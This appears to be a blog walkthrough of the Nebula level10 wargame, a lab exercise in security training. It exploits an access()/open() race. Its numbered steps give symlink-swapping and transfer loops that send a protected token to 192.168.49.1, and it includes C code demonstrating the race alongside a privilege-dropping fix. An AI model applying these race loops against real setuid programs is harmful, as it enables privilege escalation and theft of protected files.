Thursday, June 30, 2016

Exploit Exercises - nebula level10




Researching the requirements of access(), we find this:



The level10 directory has a file x which contains the token/password for flag10. It shouldn't be there. We need to find a way to transfer the token file.


We don't have read access to the token.


We will need to exploit the race condition between the access() check and the subsequent file open in the program code:



Checking how flag10 works normally:




Ok.

The following steps are needed to exploit the access() race condition:

  1. Create a fake token file - echo fake_token > /tmp/fake_token
  2. Create a soft link to our fake_token - ln -sf /tmp/fake_token token
  3. Create a soft link to the real token with the same name - ln -s /home/flag10/token token
  4. Execute steps 2 & 3 in a loop - while true; do ln -fs /tmp/fake_token token; ln -fs /home/flag10/token token; done
  5. Execute the file transfer in a loop - while true; do /home/flag10/flag10 token 192.168.49.1; done
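The race the loop above wins by chance is a classic time-of-check/time-of-use (TOCTOU) bug: access() answers for the real user, but open() later resolves the same name again, and a symlink can be re-pointed in between. The C below is an added example written for this post, not the level10 source from Exploit Exercises: it reproduces the check-then-use sequence deterministically (re-pointing the link between the two calls) so the effect is visible, and shows the fix a setuid program should use instead of access(), which is to drop its effective uid to the real uid for the open() itself. All directory names and file contents are constructed for the demonstration.

```c
/* Added example, not the Nebula level10 source: the access()/open()
 * check-then-use race behind this level and the privilege-dropping
 * pattern that avoids it. All paths and file contents are constructed. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Helper: create a file with the given contents. */
static int write_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    ssize_t w = write(fd, text, strlen(text));
    close(fd);
    return w == (ssize_t)strlen(text) ? 0 : -1;
}

/* Helper: read an open descriptor into a NUL-terminated buffer. */
static int slurp(int fd, char *buf, size_t n) {
    ssize_t r = read(fd, buf, n - 1);
    if (r < 0) return -1;
    buf[r] = '\0';
    return (int)r;
}

/* Hardened pattern for a setuid program: rather than asking access()
 * about the real user and then opening as the privileged euid, become the
 * real user for the open() itself. The kernel then checks permission on
 * the very inode it opens, so there is no window in which to swap the name. */
int read_as_real_user(const char *path, char *buf, size_t n) {
    uid_t saved = geteuid();
    if (seteuid(getuid()) != 0) return -1;
    int fd = open(path, O_RDONLY);
    int saved_errno = errno;
    if (seteuid(saved) != 0) { if (fd >= 0) close(fd); return -1; }
    if (fd < 0) { errno = saved_errno; return -1; }
    int r = slurp(fd, buf, n);
    close(fd);
    return r;
}

/* Vulnerable sequence with the symlink re-pointed between the check and
 * the open. The shell loop on this page hits that window by chance; here
 * it is hit every time. `checked` receives the contents of the file that
 * access() approved, `opened` what open() actually returned. */
int demo_toctou(char *checked, char *opened, size_t n) {
    char dir[] = "/tmp/toctou-XXXXXX";          /* constructed scratch dir */
    if (!mkdtemp(dir)) return -1;
    char fake[PATH_MAX], real[PATH_MAX], link[PATH_MAX];
    snprintf(fake, sizeof fake, "%s/fake_token", dir);
    snprintf(real, sizeof real, "%s/token", dir);
    snprintf(link, sizeof link, "%s/link", dir);
    int rc = -1, fd = -1;
    if (write_file(fake, "fake_token\n") || write_file(real, "real_token\n"))
        goto out;
    if (symlink(fake, link) != 0) goto out;
    /* Time of check: the name resolves to the harmless file. */
    if (access(link, R_OK) != 0) goto out;
    fd = open(fake, O_RDONLY);               /* record what was checked */
    if (fd < 0 || slurp(fd, checked, n) < 0) goto out;
    close(fd); fd = -1;
    /* The window: the name is re-pointed at the protected file. */
    unlink(link);
    if (symlink(real, link) != 0) goto out;
    /* Time of use: open() resolves the name again and gets the other file. */
    fd = open(link, O_RDONLY);
    if (fd < 0 || slurp(fd, opened, n) < 0) goto out;
    rc = 0;
out:
    if (fd >= 0) close(fd);
    unlink(link); unlink(fake); unlink(real); rmdir(dir);
    return rc;
}

/* Companion demo: the hardened reader on a constructed file. */
int demo_hardened(char *out, size_t n) {
    char dir[] = "/tmp/toctou-XXXXXX";
    if (!mkdtemp(dir)) return -1;
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/token", dir);
    int r = write_file(path, "token\n") == 0 ? read_as_real_user(path, out, n) : -1;
    unlink(path); rmdir(dir);
    return r;
}
```

Run as an unprivileged user, demo_toctou() reports that the check approved "fake_token" while the open delivered "real_token": the two calls never referred to the same inode. The privilege-dropping reader never asks access() anything, so it is immune to the swap; note it uses seteuid() rather than a permanent drop so the program can restore its privileges afterwards.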





The token is transferred successfully. Use it to log in as flag10 and run getflag.

